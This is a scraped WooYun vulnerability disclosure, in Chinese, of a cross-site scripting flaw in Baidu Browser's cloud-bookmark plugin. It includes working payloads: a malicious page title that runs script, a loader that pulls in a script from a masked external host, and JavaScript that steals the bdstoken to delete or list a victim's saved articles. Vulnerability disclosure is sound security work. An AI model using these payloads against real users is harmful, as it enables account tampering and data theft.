百度浏览器插件存在缺陷导致XSS | wooyun-2015-0144510| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144510

漏洞标题：百度浏览器插件存在缺陷导致XSS

漏洞作者：隐形人真忙

提交时间：2015-10-02 16:27

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：远程代码执行

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-02：细节已通知厂商并且等待厂商处理中
2015-10-10：厂商已经确认，细节仅向厂商公开
2015-10-13：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航）
2015-12-04：细节向核心白帽子及相关领域专家公开
2015-12-14：细节向普通白帽子公开
2015-12-24：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

百度浏览器某插件XSS

详细说明：

最近翻了翻百度浏览器，发现有个百度云收藏插件，下载量挺多的：

在浏览器中，主要是为了收藏一些网页到百度网盘中的百度文章里，用邪恶的title测试一下，发现存在XSS，在搭建的http域下居然可以控制**.**.**.**。

测试一下获取**.**.**.**的bdstoken：

<!DOCTYPE html>
<html>
<head>
<title>
<img src=x onerror=alert(window.__CONF__.bdstoken)>
</title>
</head>
<body>
xss
</body>
</html>

找了一圈，发现虽然不能拿到BDUSS，但是结合前面的bdstoken和一些DOM操作可以做一些其他的事情，比如浏览文章列表，删除文章等操作，下面以删除一篇文章为例：
删除文章测试代码：
本地1.html：

<!DOCTYPE html>
<html>
<head>
<title>
<img src=x onerror="var s=document.createElement('script');s.src='http://**.**.**.**/baidu.js';document.body.appendChild(s);"> 
</title>
</head>
<body>
xss
</body>
</html>

使用该插件对这个网页进行收藏，就可以触发外部js，baidu.js：

var f = document.createElement("iframe") ;
f.src = "http://**.**.**.**" ;
document.body.appendChild(f) ;
f.onload = function(){
	var d = f.contentDocument;
    var w = f.contentWindow ;
    var bdstoken = w.__CONF__.bdstoken ;
    var keys = [] ;
	var s = w.document.body.getElementsByClassName("__unitList clearfix") ;
    var nodes = s[0].childNodes ;
    console.log(nodes) ;
    for(i in nodes){
        if(nodes[i].nodeName == 'LI'){
            keys.push(nodes[i].id.substr(4)) ;
        }
    }
    console.log(keys);
    data = "param={\"records\":[\"" + keys[0] + "\"]}&bdstoken=" + bdstoken ;
    var xmlhttp = null; 
    xmlhttp = new XMLHttpRequest(); 
    xmlhttp.onreadystatechange = function(){ 
        if (xmlhttp.readyState == 4) { 
            if (xmlhttp.status == 200) { 
                var responseText = xmlhttp.responseText; 
                var w = parseDom(responseText) ;
                console.log(w); 
            } 
        } 
    } ; 
    url = "http://**.**.**.**/fav/delete"
    xmlhttp.open("POST", url, true); 
    xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    xmlhttp.send(data); 
}

还可以查看文章列表：

Baidu.js：

var w = f.contentWindow ;
    var titles = [] ;
    var s = w.document.body.getElementsByClassName("__unitList clearfix") ;
    var nodes = s[0].childNodes ;
    for(i in nodes){
        if(nodes[i].nodeName == 'LI'){
            var t = nodes[i].childNodes[5].childNodes[0].getElementsByTagName("h4")[0].getElementsByTagName("a")[0].text ;
            titles.push(t + "\n") ;
        }
    }
alert(titles) ;

漏洞证明：

rank多给点儿行吗，用不了乌云搜索真蛋疼....

修复方案：

处理一下title，进行过滤。

版权声明：转载请注明来源隐形人真忙@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：3

确认时间：2015-10-10 10:12

厂商回复：

感谢提交

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144510

漏洞标题：百度浏览器插件存在缺陷导致XSS

相关厂商：百度

漏洞作者：隐形人真忙

提交时间：2015-10-02 16:27

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：远程代码执行

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源隐形人真忙@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144510

漏洞标题：百度浏览器插件存在缺陷导致XSS

相关厂商：百度

漏洞作者： 隐形人真忙

提交时间：2015-10-02 16:27

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：远程代码执行

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0144510"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 隐形人真忙@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：隐形人真忙

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源隐形人真忙@乌云